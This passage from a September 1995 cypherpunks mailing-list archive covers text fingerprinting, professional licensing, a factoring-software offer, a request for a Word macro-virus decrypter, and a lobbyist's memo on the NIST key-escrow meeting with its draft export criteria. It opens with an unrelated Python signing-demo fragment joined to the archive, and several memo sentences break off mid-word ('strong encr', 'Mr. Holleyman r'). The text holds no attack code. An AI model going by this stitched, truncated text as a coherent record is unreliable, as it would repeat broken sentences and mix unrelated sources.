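            verify_signed(header_tampered, key))


if __name__ == "__main__":
    print(build_signed("Meet at 7pm.\n", b"example shared key").decode("ascii"))
    print(demo())
```

The header-tamper case is the reason the canonical form includes the part's own headers: an attacker who can flip the declared charset or content type of an otherwise unchanged body can change how a recipient interprets it, so the signature has to bind both.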
From unicorn at polaris.mindport.net Wed Sep 13 16:49:24 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 13 Sep 95 16:49:24 PDT Subject: Text tracking In-Reply-To: Message-ID: On Mon, 11 Sep 1995 owner-cypherpunks at toad.com wrote: > Hal Finney wrote: > > > I'm not sure how to do it for software, but for novels it > > should be easy to fingerprint. Every couple of pages the > > author writes a sentence twice in different forms. This would > > not take a great deal of extra effort on the part of the > > author. > > Perhaps. Some authors might be offended by the idea that > using a different form of a sentence doesn't affect the work. Examples of "text tracking" in documents where language specificity is important (legal, scientific) are typically marked with changes in the justification scheme, i.e. the number of spaces to the right, number of lines to a page, number of pages total, etc. etc. Clearly it is much more difficult to apply in digital schemes, but consider that in order to modify the scheme to avoid traceback to the distributor, one of two conditions must exist. 1> The distributor must be close to the initial release point. (If not, then all documents ABOVE the distributor in the chain will be text tracked, and all the documents BELOW the distributor will not. Clearly this will brand the distributor). 2> The distributor must be entirely outside the 'legal' distribution scheme. Remember also that uniform modification of text tracking methods is itself identifying unless several 'illegal' distributors are using the same sanitizing method. The same way you can get surgery to have fingerprints removed, but the resulting scars make you all the more identifiable. From dsc at swcp.com Wed Sep 13 17:05:23 1995 From: dsc at swcp.com (Dar Scott) Date: Wed, 13 Sep 95 17:05:23 PDT Subject: cryptography eliminates lawyers? 
Message-ID: Black Unicorn wrote, >But won't clients insist on proper credentials in one form or another? Yes. >Doesn't the practicality and accountability of a centralized authority >(or several authorities) provide the best answer to this? No. >Who is going >to accept my signature promising that I did indeed get a law degree and >pass the bar? Very few. Certification can be from multiple private and government organizations and might vary depending on the type of legal service (or other lawyer service) needed. Licensing can only be done by an entity that can use physical force to prevent buying and selling legal services. >I don't see how the net will eliminate the basic need for highly >qualified professionals and the proof that they have credentials. It won't. The needs might shift a little but they will be there. >Perhaps diplomas and such will be transferred into digital signatures for >the institutions, but I can't see how this "cracks" any "monopoly." >Perhaps the monopoly is shifted to those who have diplomas, rather than >those "licensed to practice" but so what? It might "crack" government enforced monopoly. Should a market monopoly survive some form of crypto-anarchy it would be in the form of a certification entity that does such a good and efficient job that it is very hard to break into the business. Not so bad if it happens, but much more honest, efficient and softer-edged than "licensed to practice". I suspect that people have needs for varying levels and varying specializations so that several kinds of certifications may develop and might be supplied by multiple entities. I suspect that many people would want a certification that a lawyer meets the usual licensing requirements of the outside world. Who knows, maybe that would be the most popular kind. But it won't be the only kind. 
Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From unicorn at polaris.mindport.net Wed Sep 13 17:30:55 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 13 Sep 95 17:30:55 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Wed, 13 Sep 1995, Dar Scott wrote: > Black Unicorn wrote, > >But won't clients insist on proper credentials in one form or another? > > Yes. > > >Doesn't the practicality and accountability of a centralized authority > >(or several authorities) provide the best answer to this? > > No. > > >Who is going > >to accept my signature promising that I did indeed get a law degree and > >pass the bar? > > Very few. > > Certification can be from multiple private and > government organizations and might vary depending > on the type of legal service (or other lawyer service) > needed. Didn't I just say this above? A centralized, or several centralized authorities. I guess the center of my question is, how can you apply Web of Trust to e.g. a university degree. Who cares what Bob and Alice think my degree is in, the client only wants to know from the institution. > Licensing can only be done by an > entity that can use physical force to prevent > buying and selling legal services. I believe you are incorrect, but I guess my main concern is your characterization of "Physical force." I am assuming you mean coercion, and not that you will be jailed or such (though this may be the case). I would argue that as long as coercion exists (violence of any type, physical or not) you have a licensing authority. Take the hollywood blacklist. 
No one actually pushed around suspected pinko screenwriters (well, at least, if anyone did, it was incidental) but they certainly faced a great deal of persuasive motivation. Look at the committee as the licensing authority here. (Licensing you as a non-communist as it were). If several governmental and private authorities were in the practice of certifying that Bob has a law degree from Tremont University, and that he is competent to practice in D.C., and given that the citizens of D.C. will look for these credentials, isn't this a license? After all, Bob has to pass some test or requirement to get the signatures. Isn't this coercion in your definition? Can't the multiple authorities set common or near common guidelines? Rather, don't they HAVE to in order to have their signatures worth the electrons they are transmitted with? If you take the extreme position you seem to, there's an antitrust case here. Am I not "licensing" my key signature to people provided they pass my key signature criteria? Am I not doing violence by withholding my signature and the benefits it might convey for certain "terms?" In this definition, all trusted authorities are by definition licensing. Either their signature is worth nothing, and thus they are not coercive by withholding it, or it is worth something, and thus to be non-coercive they must give it to anyone who asks, rendering their signatures worthless. This is the trap of the licensing argument. The evil is not licensing, which I think serves a real purpose, but created convenience fees, taxation through the withholding of licensing and the use of other government largess. I wrote a massive piece on this and sent it to the list about a year and a half ago. With interest I will repost it. The real question is how you decide what an authority to license is. Is it to be dictated by government? Or by market forces (i.e. the reputation of the licenser). 
> > >I don't see how the net will eliminate the basic need for highly > >qualified professionals and the proof that they have credentials. > > It won't. The needs might shift a little but they > will be there. Then why will lawyers, or a 'professional monopoly' be broken? > >Perhaps diplomas and such will be transferred into digital signatures for > >the institutions, but I can't see how this "cracks" any "monopoly." > >Perhaps the monopoly is shifted to those who have diplomas, rather than > >those "licensed to practice" but so what? > > It might "crack" government enforced monopoly. Now you are getting more specific. > Should a market monopoly survive some form of > crypto-anarchy it would be in the form of a > certification entity that does such a good and > efficient job that it is very hard to break > into the business. Agreed. Again, what does this do to lawyers? See my above comments on what constitutes a license. > Not so bad if it happens, > but much more honest, efficient and softer-edged > than "licensed to practice". I'm not so sure. There will be a tremendous amount of corporate power in these authorities, and if (as you seem to be saying a few paragraphs up) it is hard to break into the trusted certification business, there is a monopoly again. > I suspect that > people have needs for varying levels and varying > specializations so that several kinds of > certifications may develop and might be supplied > by multiple entities. Like the several state Bars? Hint: An attorney licensed in Delaware has a much different speciality likely than one licensed in Alabama. > I suspect that many people would want a > certification that a lawyer meets the usual > licensing requirements of the outside world. > Who knows, maybe that would be the most popular kind. > But it won't be the only kind. So you have essentially admitted that a central authority is required? Or will be more often used? So is this a license or what? Looks like one to me. 
If your definition of license is simply who does the coercing, I think you should reconsider. > Dar > > =========================================================== > Dar Scott Home phone: +1 505 299 9497 > > Dar Scott Consulting Voice: +1 505 299 5790 > 8637 Horacio Place NE Email: darscott at aol.com > Albuquerque, NM 87111 dsc at swcp.com > Fax: +1 505 898 6525 > http://www.swcp.com/~correspo/DSC/DarScott.html > =========================================================== > > > From don at cs.byu.edu Wed Sep 13 17:39:41 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Wed, 13 Sep 95 17:39:41 PDT Subject: Factoring Software (fwd) Message-ID: <199509140039.SAA00376@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- Just saw this on Usenet, was wondering who knows this guy. Obviously not a cpunk or it would have hit the list right away. Not in the mood to run code on my account without knowing that I know what it will do. From: bobs at mathworks.com (Bob Silverman) Newsgroups: sci.math,sci.crypt,alt.security.pgp,sci.math.num-analysis,comp.arch.arithmetic Subject: Factoring Code Date: 13 Sep 1995 09:22:38 -0400 Organization: The MathWorks, Inc., Natick, MA 01760 Lines: 41 Distribution: inet Message-ID: <436luu$3lu at puff.mathworks.com> NNTP-Posting-Host: puff.mathworks.com Several people have requested factoring code recently. After thinking about it I have decided to offer a deal. I do not have the machine resources I once had, and have some numbers that I would like factored. They are in the 80-90 digit range. My code will do an 85 digit number in about 500 hours on a single Sparc-10. The code is perfectly parallelizable, so 40 machines will do 85 digits overnight. Run time for QS can vary by a factor of 2.5 depending on how "rich" the number being factored is in small quadratic residues. I will make available my complete Multiple Polynomial Quadratic Sieve code, along with instructions, to anyone who will factor at least one of these numbers. 
This code includes the siever, the code to combine large primes, the matrix solver (a naive Gaussian elim over GF(2), but one which solves a 25K x 25K system in 15 min on a single Sparc), and the code to multiply everything together and find the factors. I will also throw in a routine which reads the output file and scans for bad relations. Sometimes, when running on many machines, I/O errors creep into the output files. A machine can go down when writing a record, or there can be a network problem etc. I also have a program which excises bad records in the output files, and one which sets up multiple sub-directories with the proper data files so one can run in parallel. Also included is a program which scans the output files in these multiple sub-directories and counts the number of relations found. There is also a program to predict (fairly accurately!) how close to done you are based on output from the counting program. This code will also include a decent collection of fast, very portable multiple precision routines. All this is for the taking if you guarantee to factor just one number for me. - -- Bob Silverman The MathWorks Inc. 24 Prime Park Way Natick, MA -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMFd5fsLa+QKZS485AQELHAL/QS2LizHGSzT7h3b8cU78GiR9QLoaQ6zf FEEyt8XRDFqlUe7CKFfDKB1SPPviAZeBPM4XDfswfvfXpKNLamZQUNc7VYgzPIC0 3knFeQf2A/zWuGBZQp/TM0xBcwKW5lW7 =Zyke -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From scmayo at rschp2.anu.edu.au Wed Sep 13 17:46:21 1995 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Wed, 13 Sep 95 17:46:21 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <9509140046.AA07859@toad.com> P. 
Trei writes > "CYPHERPUNK" considered harmful > I would like to propose that we, the 'cypherpunks', are making a > strategic error, which will make it far more difficult to achieve the > goal we share. > Our error lies in our approach to encouraging the widespread use of > crypto. It is an error of hubris - overweening pride. > We too often think of ourselves as an elite - smarter and better in > various ways to our non-cpunk neighbours. We refer to these others as > 'Joe Sixpack" and other such derogatory terms. I think this is confusing two separate things. The need to publicise and encourage the use of crypto is important to many of us and lots of us do this in various ways (web pages, magazine articles etc). The other aspect of the cypherpunks is writing code, discussing protocols etc, some of which is fairly arcane stuff and is by necessity the interest of an "elite" (as you put it). I think the success of this list lies in the mixture. > I suggest that we drop the term 'cypherpunk' - it has the wrong > connotations to get our ideas into the mainstream. I don't have a > perfect replacement yet: I'll come clean and say that initially the term "cypherpunks" made me cringe (and still does, maybe 'cos I'm a brit ;-) ;-) but I certainly remembered it and it stuck in my mind enough to get me interested in this stuff in the first place. In short, don't ditch the name because if nothing else it *is* memorable, much more so than some more conventional tag. However, you do make some bloody good points about not alienating more conservative people by coming over all crypto-anarchist (or whatever your particular bent is) when encouraging/publicising the use of crypto. The "why use crypto" questions and answers was a good example of how to appeal to a more conservative viewpoint. When trying to find out about crypto initially on the WWW I was rather overwhelmed by the number of political rants and a bit underwhelmed by the lack of solid info. 
This situation has improved a lot in the last 2 years but still needs work IMHO. [An aside to Web page maintainers... Another thing to consider (for Web sites in particular) is that people from _all over the world_ will be reading it. If your site is a fairly central one, bear in mind that a lot of rants about congress trampling all over the Nth amendment mean bugger all to a lot of us furriners, and come over as a bit parochial. I'm not saying a local perspective is a bad thing, just that it shouldn't be the only thing. ] my 2c worth Sherry From ponder at wane-leon-mail.scri.fsu.edu Wed Sep 13 18:15:04 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Wed, 13 Sep 95 18:15:04 PDT Subject: MS-Word macros disassembler/cracker? Message-ID: This was on the Info-Sec mailing list and appears to be a request for help in cracking some sort of execute-only wrappers on Microsoft Word-for-Windows macros, the concern being that the macros need to be defused if they're malignant. If anybody wants to, they may respond right to: njb at csehost.knoware.nl . . . . . >All the macros are made ExecuteOnly, meaning that they are compiled or >encrypted so that the Word macro interpreter can execute them, but they >cannot be listed or edited. Does anyone reading this list happen to know >where we can find a cracker or disassembler for ExecuteOnly Word macros? It >is of vital importance that we are able to read malignant Word macros, and >any help will be appreciated. . . . . >macro vira to us at the email address below. And I repeat: We are very >interested in obtaining a cracker for the Word macro language >encryptor/compiler. We haven't looked at this yet. For all we know it could >be very simple, but any info is appreciated. > >Niels > >-- Niels J Bjergstrom, Ph.D., m/ISACA Tel. +31 70 362 2269 -- >-- Computer Security Engineers, Ltd. Fax. 
+31 70 365 2286 -- >-- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 519 8011 -- >-- Netherlands Email: njb at csehost.knoware.nl -- >-- PGP Public key available on request - please use when mailing vira -- From warlord at MIT.EDU Wed Sep 13 18:20:40 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 13 Sep 95 18:20:40 PDT Subject: Factoring Software (fwd) In-Reply-To: <199509140039.SAA00376@wero.byu.edu> Message-ID: <199509140120.VAA05979@toxicwaste.media.mit.edu> > Just saw this on Usenet, was wondering who knows this guy. Obviously not > a cpunk or it would have hit the list right away. Not in the mood to run > code on my account without knowing that I know what it will do. Gee, Bob moved -- I wonder how long he's been at MathWorks... Anyways, Bob Silverman is a known Factoring Guy (TM). He's been involved in network factoring for a long time. The software he is distributing, MPQS, is the algorithm that was used to factor rsa-129. Although this is probably not the same implementation that we used then, it probably is pretty much the same. I've met Bob; he is not a tentacle. ;-) -derek From tcmay at got.net Wed Sep 13 18:20:58 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 13 Sep 95 18:20:58 PDT Subject: "Who knows this guy?" Message-ID: At 12:39 AM 9/14/95, don at cs.byu.edu wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >Just saw this on Usenet, was wondering who knows this guy. Obviously not >a cpunk or it would have hit the list right away. Not in the mood to run >code on my account without knowing that I know what it will do. > > >From: bobs at mathworks.com (Bob Silverman) >Newsgroups: >sci.math,sci.crypt,alt.security.pgp,sci.math.num-analysis,comp.arch.arithme >tic It's funny, this thing about names and reputations. You see, I know the name "Bob Silverman," and his company, Mathworks, a whole lot more than I know the name "don at cs.byu.edu". 
Mathworks was heavily in the news last fall during the Pentium debacle (including someone I used to know from Intel, Cleve Moler). I've only seen the posts of "don at cs.byu.edu" since 8-29-95, just the last two weeks. (I don't claim to have a complete archive, as I delete a lot of stuff. But this is the earliest don at cs.byu.edu post I can find.) Certainly I am not impugning the reputation of don at cs.byu.edu, just noting the irony of him asking if anyone knows who Bob Silverman is. Strange days. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From mnorton at cavern.uark.edu Wed Sep 13 18:55:35 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 13 Sep 95 18:55:35 PDT Subject: Key Escrow as Law Enforcement's *Worst Nightmare* In-Reply-To: Message-ID: Darn. I always thought it came from "The Monkey's Paw." MacN On Tue, 12 Sep 1995, Timothy C. May wrote: > > "Be careful what you ask for--you might get it." (Albanian Proverb) > From stewarts at ix.netcom.com Wed Sep 13 18:59:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 13 Sep 95 18:59:19 PDT Subject: An opportunity not to be missed Message-ID: <199509140159.SAA16728@ix3.ix.netcom.com> >On Wed, 13 Sep 1995, David C. Lambert wrote: > >> I propose that we get some likely candidate (actually, a similar candidate >> to the one above) to advocate the benefits of anonymity on the net. Is Wavy Gravy running his "Nobody for President" campaign again this time? 
After all, Nobody's going to balance the budget, and Nobody's going to get the government out of your bedroom, and on the internet, Nobody can tell if you're a dog or not :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 13 18:59:30 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 13 Sep 95 18:59:30 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <199509140159.SAA16796@ix3.ix.netcom.com> This whole flap reminds me of the days it was discovered that the FBI was buying Usenet access, on tape monthly rather than online. >(Phill Hallam Baker's request that we respect the privacy of >Government employees started this thread) Yup. It would be nice to know what our employees are doing with all this fancy equipment we've bought them, but on the other hand, I'd far rather have them seeing the abuse the net gives them in person rather than having to have the FBI or some other filtering bureaucracy explain to them what the net is all about ... #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 13 19:00:28 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 13 Sep 95 19:00:28 PDT Subject: GAK/weak crypto rationale? Message-ID: <199509140159.SAA16862@ix3.ix.netcom.com> At 11:46 PM 9/12/95 -0400, Brian Davis wrote: >> > I don't doubt that wiretaps may sometimes be abused despite the >> > incredibly onerous review process, but they have positive aspects, too. >> >> In how many of these cases did you fail to get the necessary information >> because of encryption? Has this proportion been changing over the years? > >I wasn't personally involved in any of the cases, but I suspect the >answer re encryption is zero. 
There was the time the FBI agent failed to >push the record button, however. >My response was to the wiretap correlation to career-making cases. >I don't believe encryption is widespread enough yet to be a serious problem >in the Title III area. It is a potential problem, though, as encryption >(rightfully) spreads. You're probably right. On the other hand, especially as dealers in politically incorrect substances get better privacy technology, this will become much more of an issue, and I get the impression from what I read in the papers that big drug busts, arrests of major organized crime figures, and the rare terrorist cases are probably big career wins for the police agents and prosecutors involved. >The question I am debating with myself, with all >of your help, is what the policy "ought to be." As you might guess, I think the government makes lots of laws about things that are not their business, and wiretaps and other privacy invasions are especially useful for prosecuting victimless crimes and dissident political groups, since none of the participants call the cops. On the other hand, I've had friends whose businesses have been burned down by the Mafia, and don't like murderers bombing pubs, either, and stopping people like that is legitimate police business. However, I think the moral case is very clear that people have the right to communicate freely and privately, and to use whatever technology or languages they want to to attempt to do so; any government that would try to prevent that is more of a threat to freedom than a benefit. And police have had a lot of success with informants, and new technology has really improved equipment for bugging suspects- if you folks do your jobs honestly and apologize when you make mistakes about invading incorrect suspects' privacy, go ahead and use it. The really gray areas are things like widespread coordinated surveillance of public activities - cameras in the subways, etc. 
#--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From gnu at toad.com Wed Sep 13 19:19:19 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 13 Sep 95 19:19:19 PDT Subject: Ron Plesser's take on NIST GAK meeting Message-ID: <9509140219.AA09487@toad.com> I converted a document in some proprietary Windows binary format to ASCII. Formatting mistakes are mine. Ron Plesser is a very experienced lobbyist. He was involved in the passage of the ECPA, among other things. He's CIX's lawyer, and sent this document to CIX (the Commercial Internet Exchange), which passed it on to its membership. John Gilmore PIPER & MARBURY L.L.P. Memorandum To: Interested Parties From: Ron Plesser Date: September 11, 1995 Subject: NIST Key Escrow Encryption Meeting The National Institute of Standards and Technology on September 6 and 7 held a meeting on issues regarding key escrow encryption, focusing on export criteria for software and desirable characteristics for U.S. key escrow agents. Ten draft software key escrow export criteria were put forth by NIST for consideration and possible revision (see below). Key escrow encryption is the recent Administration proposal for an alternative to Clipper Chip, which industry opposed. Key escrow would, in the Administration's view, allow the export of software with strong encryption. In summary, the government would permit the general licensing of 64-bit-key encryption provided that it be manufactured with a key that would be maintained by independent escrow agents who were certified by the U.S. government. Foreign escrow agents could be used where there was a bilateral agreement with the particular country involved. NIST Deputy Director Ray Kammer provided an overview of the goals of the meeting, and said that NIST plans to issue a Federal Register notice containing a "revised set of thoughts" in three weeks. 
There will be a 60-day comment period following publication of the revised principles in the Federal Register. The NIST will then review the comments received and determine whether there is enough consensus to proceed. There will be additional meetings on September 15, 1995 to discuss the Federal government's requirements for its own information processing standards for key escrow encryption. This meeting will take place at the Gaithersburg, Maryland Hilton Hotel from 9:00 a.m. to 5:00 p.m. It was clear from the meeting, both in presentations and conversation during breaks, that most computer systems and certainly those used by large entities will have key escrow systems for encryption. There was even a person who spoke who said that they are doing this now. Many people at the meeting acknowledged that key escrow would be implemented at some point for domestic as well as for exported programs. The issue is who would hold the key. For example, could a company hold its own keys or could an independent agent be used? The people who create mass market software, however, still expressed significant opposition to key escrow. While the government went to some length to express that this solution is neutral as to software or hardware, it has to be acknowledged that hardware-based systems are easier to control. The subject that was not well discussed was encryption in relation to network services and the internet. It was discussed in relation to the issues of interoperability and the ability to decrypt both sides of a communication. The assumption that I and others had at the outset was that the Administration had made progress in the last year in raising itself from the ashes of Clipper Chip. By the end of the meeting that was not altogether clear. There will remain a great deal of controversy surrounding this issue. Congress is sure to get involved and it will get messier before it gets resolved. 
Administration Comments Mike Nelson, who is special assistant for information technology to the White House Office of Science and Technology Policy and co-chair of the inter-agency working group on encryption, provided a historical overview of the data encryption issue. He said that the proposed 64-bit-key encryption is 17 million times stronger than the 40-bit-key encryption currently allowed to be exported. Under the proposed policy, software with 64-bit-key encryption could be exported to friendly countries under certain conditions, all of which require that a key to that encryption be available in the U.S. from an independent third-party. Mr. Nelson stated that the new policy will open up new market opportunities for the U.S. computer software industry, and that key escrow has the potential to become a de facto global standard. The Administration policy for 40-bit-key encryption will continue as-is, and no keys will have to be escrowed for such systems. Mr. Nelson said that the government's main concern is that strong encr In response to questioning, Mr. Nelson stated that the 64-bit-key limit is being imposed because the government is not certain that the key escrow system will work. Once the system is up and running, longer keys may be allowable. He said that the draft criteria are based on national security needs, and that they were pushed as far as possible to meet commercial needs. Mr. Nelson added that the Administration is discussing the possibility of federal legislation with Hill staff to avoid varying state laws on encryption. Industry Perspectives General reaction was mixed to the government's proposal. Most heavy industrial and commercial users of encryption seemed accepting of the Administration's position. To them this meant greater flexibility and would mean that most larger systems could get export licenses for 64-bit-key systems and this would expand the capacity to sell larger systems abroad. 
This position was exemplified by Trusted Information Systems (TIS), representatives of which spoke several times. In a presentation, Peter Dinsmore of TIS offered restatements of the criteria to make them more commercially viable, and a set of "criteria for the criteria," which are as follows: 1) don't specify commercial criteria, 2) don't exceed the minimum, 3) don't allow criteria creep, 4) don't solve the dual-rogue problem, 5) don't over protect, and 6) use generic nomenclature. He recommended that criteria six and nine be removed altogether, a view that was echoed by other participants. The mass market software industry and the public interest groups were very opposed to the Administration proposal. They do not believe that 64-bit key is sufficient, and they do not believe that anyone will buy U.S.-manufactured software with a key that is to be held by a third party under at least some control by the government. There was a fair amount of confusion on the issue at the meeting, but it now seems clear that the government would permit foreign escrow where there are bi-lateral agreements with friendly nations. In a presentation, Bob Holleyman of the Business Software Alliance criticized the Administration's failure to "liberalize export controls on generally available software employing non-key escrow encryption." Also, he stated that the Administration's proposal and the draft criteria "continue to reflect a misunderstanding of the market place and, if implemented in anything like their current form, will prevent key escrow encryption from ever being commercially adopted." Mr. Holleyman r In addition, the representative of MCI strongly objected to the proposal as an incursion into the private sector and as an impediment to the development of a strong information infrastructure. Encryption guru Whit Diffie of Sun Micro Systems and others objected to the proposal. 
Danny Weitzner of the Center for Democracy and Technology said that CDT was going to go to Congress and object to the implementation of this proposal. They thought that it was a bad deal and the government should not be placed in the position of directing standards and requiring back doors into encryption systems.

Discussion of Criteria Six, Seven and Eight

Following the industry presentations, participants divided into groups to discuss various criteria. The group that discussed criteria six, seven and eight made the following observations and recommendations. There seemed to be universal objection to criterion six. This would limit the interoperability of systems. It effectively states that exported 64-bit key cannot be used to decrypt messages that were encrypted with a higher value. This would make it very difficult for U.S. companies to interact with foreign subsidiaries. The internet would find great difficulty in connection with this criterion. Regarding criterion seven, concern was raised that in the context of e-mail, it would be onerous to do key escrow for every transmission. Concern also was raised about maintaining the integrity of intellectual property in instances in which the escrow agent is in a foreign country. In effect, when one chooses an escrow center, one also is selecting a legal system. A request was made for a supplemental document explaining applicable existing laws. Concern was raised that all of the criteria are focused on the voice communication paradigm, rather than on the dynamic data communications environment. Laws also are focused on this paradigm, and law moves slowly whereas computer technology moves rapidly. In addition, the criteria do not address varying international laws on issues such as privacy. Companies will have to comply with the laws of the strictest countries. Concern was raised that privacy considerations are not as apparent in the criteria as ease of access by law enforcement agencies.
Also, innocent parties could be de-escrowed. In addition, it was emphasized that encryption must not interfere with use of existing software. Information was requested on two encryption schemes, Banker's Trust and Fortress. It was recommended that the TIS restatement of criterion seven be adopted. This restatement is as follows: "The key escrow mechanism allows access to both sides of a simultaneous (i.e., two-way) communication with only access to the decrypting information from one of the users." It also was recommended that for bi-directional communications, both parties negotiate a common key and escrow it, and that for one way communications, the sender select the escrow key. Regarding criterion eight, it was agreed that the technology issues, international issues, and privacy issues are the same as those for criterion seven. It was noted that certain implementations would require escrowing of the session key, which is unrealistic. It was agreed that with one court order, law enforcement agencies should have the ability to decrypt a stream of messages. However, there must be a time limit on decryption. It was agreed that agents should be able to implement an automated system.

General Review/Comments on All Criteria

Industry and government representatives met less formally with the objective of reviewing each of the criteria and attempting to reconcile differences. However, this did not occur; instead, broader issues were discussed. There was a certain amount of tension during this session, as each side complained that the other did not understand its needs. Industry members said that it seemed that implementation of the draft criteria, or a version thereof, is a foregone conclusion on the part of government, without industry input concerning the entire concept. Specifically, industry members challenged the 64-bit maximum as being arbitrary and unnecessary.
They said that although 56-bit encryption was discussed with government last year, technology moves rapidly, and now 64 bits are not enough. A NIST representative countered that the National Security Agency is "putting a big card on the table" with 64 bits. Industry members also protested that the criteria do not meet the needs of the global marketplace. Consumers will not buy products designed to meet these criteria because they already have access to 64-bit encryption with no keys either free or at a low cost. They argued that the scope of the criteria (e.g., criterion nine) is broader than the stated objective of exportability, and requested more information as to why each criterion is being proposed. Concern also was raised that foreign countries with bi-lateral agreements with the U.S. will act against U.S. key escrow agents. Also, industry will not know the terms of these agreements.

Export Procedures

Officials of the Department of State and the Department of Commerce explained in general terms how this program would work. Each application would go first to the State Department for a jurisdictional certification on technical aspects. If State were satisfied that the criteria had been met, then it would certify the application over to the Commerce Department for general licensing procedures. There would also be an escrow package, that would have to be certified. It was not clear who would control the certification of escrow agents.

Escrow Agents

The issue of who could be an escrow agent and how they would be controlled was discussed, but not resolved. The issues of liability for wrongful release, the conditions of release, and related questions were not resolved. It seemed clear to me that escrow agents would have to be independent of the user entity. If this law firm were to use an encryption package in its London office, the key would have to be placed with a third party.
Conclusion

While no issues were resolved at the meeting, it provided a valuable forum for the exchange of ideas between government and industry. Focus now turns to Congress, and to the crafting of a constructive response to the upcoming Federal Register notice. The Administration seems open to changes. The mass market software industry and the public interest community seem negative. We will continue to keep you informed.

--- Draft Export Criteria ---
for Software Key Escrow Encryption

Software key escrow encryption products meeting the following criteria will be granted special export licensing treatment similar to that afforded other mass-market software products with encryption.

1. The product will use an unclassified encryption algorithm (e.g., DES, RC4) with a key length not to exceed 64 bits.
2. The product shall be designed to prevent multiple encryption (e.g., triple-DES).
3. The key required to decrypt each message or file shall be accessible through a key escrow mechanism in the product, and such keys will be escrowed during manufacture in accordance with #10. If such keys are not escrowed during manufacture, the product shall be inoperable until the key is escrowed in accordance with #10.
4. The key escrow mechanism shall be designed to include with each encrypted message or file, in a format accessible by authorized entities, the identity of the key escrow agent(s), and information sufficient for the escrow agent(s) to identify the key or key components required to decrypt that message.
5. The product shall be resistant to any alteration that would disable or circumvent the key escrow mechanism, to include being designed so that the key escrow mechanism cannot be disabled by a static patch, (i.e., the replacement of a block of code by a modified block).
6. The product shall not decrypt messages or files encrypted by non-escrowed products, including products whose key escrow mechanisms have been altered or disabled.
7. The key escrow mechanism allows access to a user's encrypted information regardless of whether that user is the sender or the intended recipient of the encrypted information.
8. The key escrow mechanism shall not require repeated involvement by the escrow agents for the recovery of multiple decryption keys during the period of authorized access.
9. In the event any such product is or may be available in the United States, each production copy of the software shall either have a unique key required for decrypting messages or files that is escrowed in accordance with #10, or have the capability for its escrow mechanism to be rekeyed and any new key to be escrowed in accordance with #10.
10. The product shall accept escrow of its key(s) only with escrow agents certified by the U.S. Government or by foreign governments with which the U.S. Government has formal agreements consistent with U.S. law enforcement and national security requirements.

Note: Software products incorporating additional encryption methods other than key escrow encryption methods will be evaluated for export on the basis of each encryption method included, as is already the case with existing products. Accordingly, these criteria apply only to the key escrow encryption method incorporated by a software product, and not to other non-escrowed encryption methods it may incorporate. For instance, non-escrowed encryption using a key length of 40 bits or less will continue to be exportable under existing export regulations.

- Please also review discussion paper #1 (distributed earlier), which raises a number of issues involving exportability criteria and how exportable products could be designed. Discussion paper #2 (also previously distributed) presents questions involving key escrow agents.

From pfarrell at netcom.com Wed Sep 13 19:22:33 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 13 Sep 95 19:22:33 PDT Subject: Can GAK be made "not interoperable" with PGP?
Message-ID: <80481.pfarrell@netcom.com>

Duncan Frissell writes:
> Timothy C. May wrote:
>> But is this even possible, to make a GAK system "not interoperable" with,
>> say, PGP?
>> Unless the GAK system has some sort of entropy analyzer, and can
>> recognize high-entropy sources which it presumes to be encrypted data
>> (*), one can of course PGP-encrypt a text file and then GAK the
>> resulting file.
>
> I took it to mean that they were saying that an approved program on one
> end of a communication exchange could not exchange encrypted messages or
> establish an encrypted session of some kind with an unapproved program
> on the other end. Not trying to outlaw superencryption (PGP on both ends
> using a GAKed channel) but GAK on one end working with an unapproved
> system on the other end. A ringer GAK-work-alike that would defeat the
> intent of GAK.
> I don't know if the government can prevent that with a software-only
> system or indeed if half a secure system can be made completely secure.

